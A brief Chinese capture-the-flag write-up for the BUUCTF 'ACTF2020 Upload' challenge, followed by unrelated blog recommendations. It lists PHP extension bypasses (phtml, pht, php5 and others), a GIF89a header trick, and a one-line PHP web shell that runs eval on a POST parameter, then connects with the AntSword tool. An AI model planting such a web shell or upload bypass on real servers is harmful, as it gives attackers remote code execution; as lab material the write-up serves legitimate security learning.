buuctf web [ACTF2020 新生赛]Upload

明了但不明显的文件上传

传个试试

行,抓包吧,php格式不行,就先上传要求的格式:jpg、png、gif

抓到上传的包之后,再修改成我们想要的

常见的php格式绕过有:php,php3,php4,php5,phtml,pht

挨个试试

这是上个图片题上传的木马,没有改格式,让上传图片,最好加上(GIF89a)

一句话木马:GIF89a

<script language="php">eval($_POST['cmd']);</script>

上传成功,它也把保存的路径告诉你了

掏出蚁剑大宝贝梭哈就完了

flag

相关推荐
程序视点3 小时前
IObit Uninstaller Pro专业卸载,免激活版本,卸载清理注册表,彻底告别软件残留
前端·windows·后端
前端程序媛-Tian3 小时前
【dropdown组件填坑指南】—怎么实现下拉框的位置计算
前端·javascript·vue
嘉琪0013 小时前
实现视频实时马赛克
linux·前端·javascript
烛阴4 小时前
Smoothstep
前端·webgl
若梦plus4 小时前
Eslint中微内核&插件化思想的应用
前端·eslint
爱分享的程序员4 小时前
前端面试专栏-前沿技术:30.跨端开发技术(React Native、Flutter)
前端·javascript·面试
超级土豆粉4 小时前
Taro 位置相关 API 介绍
前端·javascript·react.js·taro
若梦plus4 小时前
Webpack中微内核&插件化思想的应用
前端·webpack
若梦plus4 小时前
微内核&插件化设计思想
前端
柯北(jvxiao)4 小时前
搞前端还有出路吗?如果有,在哪里?
前端·程序人生